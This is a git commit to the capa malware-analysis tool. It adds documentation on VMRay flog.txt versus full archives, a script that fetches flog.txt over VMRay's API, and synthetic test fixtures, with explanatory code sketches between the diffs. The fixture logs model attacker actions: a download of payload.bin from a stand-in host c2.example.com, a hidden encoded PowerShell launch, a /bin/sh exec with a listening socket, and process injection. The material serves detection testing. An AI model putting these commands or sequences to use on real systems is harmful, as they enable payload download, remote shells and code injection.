Commit 548d814

vmray: add docs, fetch helper, and fixture-based regression tests for flog.txt
Addresses reviewer feedback on #2878:

1. Document flog.txt vs full archive trade-offs in doc/usage.md with a comparison table (available features, how to obtain, file size).
2. Add scripts/fetch-vmray-flog.py: given a VMRay instance URL, API key, and sample SHA-256, downloads flog.txt via the REST API and optionally runs capa against it.
3. Add fixture-based regression tests (tests/fixtures/vmray/flog_txt/) with three representative flog.txt files:
   - windows_apis.flog.txt: Win32 APIs, string args with backslash paths, numeric args, multi-process
   - linux_syscalls.flog.txt: Linux sys_-prefixed calls (all stripped)
   - string_edge_cases.flog.txt: paths with spaces, UNC paths, URLs, empty

tests/test_vmray_flog_txt.py gains 14 new feature-presence tests covering API, String, and Number extraction at the call scope, plus negative checks (double-backslash must not appear; sys_ prefix must not appear).

Fixes #2878
1 parent b924721 commit 548d814

7 files changed

Lines changed: 709 additions & 11 deletions

CHANGELOG.md

Lines changed: 1 addition & 0 deletions
@@ -6,6 +6,7 @@
 
 - ghidra: support PyGhidra @mike-hunhoff #2788
 - vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452
+- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878
 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835
 
 ### Breaking Changes

doc/usage.md

Lines changed: 30 additions & 0 deletions
@@ -16,6 +16,36 @@ See `capa -h` for all supported arguments and usage examples.
 
 By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched.
 
+## VMRay: flog.txt vs full analysis archive
+
+When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file.
+Choose based on what you have access to and what features you need.
+
+| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** |
+|-|-|-|
+| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* |
+| **File size** | Small text file | Large encrypted ZIP |
+| **Dynamic API calls** | ✓ | ✓ |
+| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Static imports / exports** | ✗ | ✓ |
+| **PE/ELF section names** | ✗ | ✓ |
+| **Embedded file strings** | ✗ | ✓ |
+| **Base address** | ✗ | ✓ |
+| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) |
+
+**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log.
+
+**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data.
+
+```
+# flog.txt — free, limited to dynamic API calls
+capa path/to/flog.txt
+
+# Full VMRay archive — requires subscription, richer features
+capa path/to/analysis_archive.zip
+```
+
 ## tips and tricks
 
 ### only run selected rules
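The doc hunk above describes two kinds of VMRay input. As a rough illustration of telling them apart before handing a file to capa, here is a minimal sketch. The helper name `classify_vmray_input` and the marker constant are hypothetical, and this is not how capa itself detects formats. It assumes a flog.txt carries a `# Flog Txt Version` header line near the top, as the fixtures in this commit do.

```python
import zipfile
from pathlib import Path

# Assumption: flog.txt files start with a few "#" header lines, one of which
# begins with this marker (as in the fixtures added by this commit).
FLOG_MARKER = "# Flog Txt Version"


def classify_vmray_input(path: Path) -> str:
    """Return "archive", "flog_txt", or "unknown" for a candidate capa input."""
    # is_zipfile only checks the ZIP structure, so encrypted archives still match.
    if zipfile.is_zipfile(path):
        return "archive"
    with path.open("r", encoding="utf-8", errors="replace") as f:
        # Only scan the first few lines; the header sits at the top of the file.
        for _, line in zip(range(10), f):
            if line.startswith(FLOG_MARKER):
                return "flog_txt"
    return "unknown"
```

A check like this could also be used as a sanity test on a downloaded file, since a response that turns out to be a ZIP would be classified as `"archive"` rather than `"flog_txt"`.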

scripts/fetch-vmray-flog.py

Lines changed: 270 additions & 0 deletions
@@ -0,0 +1,270 @@
+#!/usr/bin/env python3
+# Copyright 2025 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+"""
+Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it.
+
+Given a sample SHA-256 hash and VMRay credentials, this script:
+  1. Looks up the sample on the VMRay instance.
+  2. Finds the most-recent analysis for that sample.
+  3. Downloads the flog.txt (Download Function Log) from the analysis archive.
+  4. Optionally runs capa against the downloaded file.
+
+Requirements:
+    pip install requests
+
+Usage::
+
+    python scripts/fetch-vmray-flog.py \\
+        --url https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --output /tmp/sample_flog.txt
+
+    # Fetch and immediately run capa:
+    python scripts/fetch-vmray-flog.py \\
+        --url https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --run-capa
+
+VMRay API reference:
+    https://docs.vmray.com/documents/api-reference/
+
+Note: this script requires a VMRay account. The flog.txt itself is freely available
+("Download Function Log") in the VMRay Threat Feed web UI, but downloading it
+programmatically via the REST API requires valid API credentials.
+"""
+
+import argparse
+import logging
+import subprocess
+import sys
+from pathlib import Path
+
+import requests
+
+logger = logging.getLogger(__name__)
+
+# ---------------------------------------------------------------------------
+# VMRay REST API helpers
+# ---------------------------------------------------------------------------
+
+_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt"
+
+
+def _session(url: str, apikey: str) -> requests.Session:
+    """Return an authenticated requests.Session for the given VMRay instance."""
+    s = requests.Session()
+    s.headers.update(
+        {
+            "Authorization": f"api_key {apikey}",
+            "Accept": "application/json",
+        }
+    )
+    s.verify = True  # set to False only when using self-signed certificates
+    s.base_url = url.rstrip("/")  # type: ignore[attr-defined]
+    return s
+
+
+def _get(session: requests.Session, path: str, **kwargs) -> dict:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.json()
+
+
+def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.content
+
+
+def lookup_sample(session: requests.Session, sha256: str) -> dict:
+    """
+    Return the VMRay sample record for the given SHA-256.
+    Raises ValueError if the sample is not found.
+    """
+    data = _get(session, f"/rest/sample/sha256/{sha256}")
+    if data.get("result") != "ok" or not data.get("data"):
+        raise ValueError(f"sample not found on VMRay instance: {sha256}")
+    # data["data"] is a list; take the first entry
+    return data["data"][0]
+
+
+def get_latest_analysis(session: requests.Session, sample_id: int) -> dict:
+    """
+    Return the most-recent finished analysis for the given VMRay sample ID.
+    Raises ValueError if no analysis is found.
+    """
+    data = _get(session, "/rest/analysis", params={"sample_id": sample_id})
+    analyses = data.get("data", [])
+    if not analyses:
+        raise ValueError(f"no analyses found for sample_id={sample_id}")
+    # Sort by analysis_id descending (newest first)
+    analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True)
+    return analyses[0]
+
+
+def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes:
+    """
+    Download the flog.txt content for the given VMRay analysis ID.
+
+    VMRay exposes the function log via the analysis archive endpoint.
+    We request only the flog_txt entry from the archive using the
+    ``file_filter`` query parameter.
+    """
+    # Try the dedicated log endpoint first (VMRay >= 2024.x)
+    try:
+        content = _get_bytes(
+            session,
+            f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary",
+        )
+        if content:
+            return content
+    except requests.HTTPError:
+        pass
+
+    # Fallback: download via the analysis archive with a file filter
+    content = _get_bytes(
+        session,
+        f"/rest/analysis/{analysis_id}/archive",
+        params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH},
+    )
+    return content
+
+
+# ---------------------------------------------------------------------------
+# main
+# ---------------------------------------------------------------------------
+
+
+def main(argv=None):
+    if argv is None:
+        argv = sys.argv[1:]
+
+    parser = argparse.ArgumentParser(
+        description="Download VMRay flog.txt for a sample hash and (optionally) run capa."
+    )
+    parser.add_argument(
+        "--url",
+        required=True,
+        metavar="URL",
+        help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com",
+    )
+    parser.add_argument(
+        "--apikey",
+        required=True,
+        metavar="KEY",
+        help="VMRay REST API key (Settings → API Keys).",
+    )
+    parser.add_argument(
+        "--sha256",
+        required=True,
+        metavar="SHA256",
+        help="SHA-256 hash of the sample to analyse.",
+    )
+    parser.add_argument(
+        "--output",
+        metavar="PATH",
+        help="Where to save the downloaded flog.txt. Defaults to <sha256>_flog.txt in the current directory.",
+    )
+    parser.add_argument(
+        "--run-capa",
+        action="store_true",
+        dest="run_capa",
+        help="After downloading, run 'capa <output>' and print the results.",
+    )
+    parser.add_argument(
+        "--capa-args",
+        metavar="ARGS",
+        default="",
+        help="Extra arguments forwarded to capa (only used with --run-capa).",
+    )
+    parser.add_argument(
+        "--no-verify-ssl",
+        action="store_false",
+        dest="verify_ssl",
+        help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).",
+    )
+    parser.add_argument(
+        "-d", "--debug", action="store_true", help="Enable debug logging."
+    )
+    args = parser.parse_args(argv)
+
+    logging.basicConfig(
+        level=logging.DEBUG if args.debug else logging.INFO,
+        format="%(levelname)s: %(message)s",
+    )
+
+    output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt")
+
+    session = _session(args.url, args.apikey)
+    session.verify = args.verify_ssl  # type: ignore[assignment]
+
+    # Step 1 — look up sample
+    logger.info("looking up sample %s …", args.sha256)
+    try:
+        sample = lookup_sample(session, args.sha256)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find sample: %s", exc)
+        return 1
+
+    sample_id: int = sample["sample_id"]
+    logger.debug("found sample_id=%d", sample_id)
+
+    # Step 2 — find the latest analysis
+    logger.info("fetching analysis list for sample_id=%d …", sample_id)
+    try:
+        analysis = get_latest_analysis(session, sample_id)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find analysis: %s", exc)
+        return 1
+
+    analysis_id: int = analysis["analysis_id"]
+    logger.debug("using analysis_id=%d", analysis_id)
+
+    # Step 3 — download flog.txt
+    logger.info("downloading flog.txt for analysis_id=%d …", analysis_id)
+    try:
+        flog_bytes = download_flog_txt(session, analysis_id)
+    except requests.HTTPError as exc:
+        logger.error("failed to download flog.txt: %s", exc)
+        return 1
+
+    if not flog_bytes:
+        logger.error(
+            "received empty response — flog.txt may not be available for this analysis"
+        )
+        return 1
+
+    output_path.write_bytes(flog_bytes)
+    logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes))
+
+    # Step 4 (optional) — run capa
+    if args.run_capa:
+        capa_cmd = ["capa", str(output_path)] + (
+            args.capa_args.split() if args.capa_args else []
+        )
+        logger.info("running: %s", " ".join(capa_cmd))
+        result = subprocess.run(capa_cmd)
+        return result.returncode
+
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
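One detail in step 4 of the script is that `--capa-args` is split with `str.split()`, which breaks apart any quoted argument containing spaces. The sketch below shows one possible alternative using `shlex.split` from the standard library. The function name `build_capa_command` is hypothetical and not part of the commit.

```python
import shlex
from typing import List


def build_capa_command(output_path: str, capa_args: str = "") -> List[str]:
    """Build the argv list for running capa on a downloaded flog.txt."""
    # shlex.split honours shell-style quoting, so '-r "my rules/dir"' stays
    # two tokens instead of three; an empty string yields an empty list.
    return ["capa", output_path] + shlex.split(capa_args)


# Hypothetical invocation: a rules directory whose path contains a space.
print(build_capa_command("sample_flog.txt", '-r "my rules/dir" -vv'))
# prints ['capa', 'sample_flog.txt', '-r', 'my rules/dir', '-vv']
```

The resulting list can be passed to `subprocess.run` unchanged, as the script already does with `capa_cmd`.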
tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt

Lines changed: 43 additions & 0 deletions
@@ -0,0 +1,43 @@
+# Log Creation Date: 02.01.2025 12:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x1234"
+os_parent_pid = "0x1"
+parent_id = "0"
+image_name = "backdoor"
+filename = "/tmp/backdoor"
+cmd_line = "/tmp/backdoor"
+monitor_reason = "analysis_target"
+
+Region:
+id = "1"
+name = "stack"
+
+Thread:
+id = "1"
+os_tid = "0x1234"
+[0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100
+[0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6
+[0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3
+[0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+[0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4
+[0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0
+[0001.006] sys_fork () returned 0x2345
+[0001.007] sys_getuid () returned 0x0
+[0001.008] sys_setuid (uid=0x0) returned 0x0
+[0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0
+[0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0
+[0001.011] sys_time (tloc=0x0) returned 0x677f2000
+[0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0
+[0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0
+[0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000
+[0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0
+[0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0
+[0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+[0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0
+[0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5
+[0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20
+[0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40
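The commit message says the `sys_` prefix must not appear in extracted API names. To make the call-line shape in this fixture concrete, here is a minimal sketch of parsing one line and stripping that prefix. It is not capa's parser: `parse_call` and both regular expressions are hypothetical and only assume the `[time] name (k=v, ...) returned value` layout seen in the fixture.

```python
import re
from typing import Dict, Optional, Tuple

# Assumed line shape, taken from the fixture:
#   [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3
CALL_RE = re.compile(
    r"^\[\d+\.\d+\]\s+(?P<api>\w+)\s+\((?P<args>.*)\)\s+returned\s+(?P<ret>\S+)$"
)
# An argument is name=value, where value is a quoted string or a bare token.
ARG_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|[^,]+)')


def parse_call(line: str) -> Optional[Tuple[str, Dict[str, str], str]]:
    """Return (api_name, raw_args, return_value), or None for non-call lines."""
    m = CALL_RE.match(line.strip())
    if m is None:
        return None
    api = m.group("api")
    # Linux syscalls are logged with a sys_ prefix; drop it from the API name.
    if api.startswith("sys_"):
        api = api[len("sys_"):]
    # Values are kept as raw text (string arguments keep their quotes).
    args = {name: value.strip() for name, value in ARG_RE.findall(m.group("args"))}
    return api, args, m.group("ret")
```

With this sketch, the `sys_fork ()` line yields the name `fork` with no arguments, and header lines such as `Process:` return `None`.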
tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt

Lines changed: 37 additions & 0 deletions
@@ -0,0 +1,37 @@
+# Log Creation Date: 03.01.2025 08:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x2000"
+os_parent_pid = "0x4"
+parent_id = "0"
+image_name = "edgecase.exe"
+filename = "c:\\users\\test\\edgecase.exe"
+cmd_line = "edgecase.exe"
+monitor_reason = "analysis_target"
+
+Region:
+id = "5"
+name = "private_0x0000000000010000"
+
+Thread:
+id = "1"
+os_tid = "0x2100"
+[0001.000] GetCurrentProcess () returned 0xffffffffffffffff
+[0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8
+[0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0
+[0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9
+[0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff
+[0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0
+[0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1
+[0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1
+[0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0
+[0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1
+[0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0
+[0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256
+[0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128
+[0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1
+[0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1
+[0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200
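String arguments in this fixture are written with escaped backslashes, and the commit message says the extracted strings must not contain double backslashes. The sketch below shows one plausible normalisation: strip the surrounding quotes and collapse each escaped backslash pair. The helper name `unescape_flog_string` is hypothetical, and how capa's extractor treats UNC prefixes or other escapes such as `\n` is not shown in this commit.

```python
def unescape_flog_string(raw: str) -> str:
    """Strip surrounding quotes and collapse escaped backslashes in a flog.txt string argument."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        raw = raw[1:-1]
    # Each escaped pair "\\" in the log text stands for one literal backslash.
    return raw.replace("\\\\", "\\")


# Raw text exactly as it appears in the fixture (raw string literals keep the backslashes).
print(unescape_flog_string(r'"C:\\path with spaces\\file name.txt"'))
print(unescape_flog_string(r'"\\\\server\\share\\document.docx"'))
```

Under this rule a UNC path still begins with two backslashes after unescaping, because the log text holds four there. A negative check for double backslashes would need to account for that case.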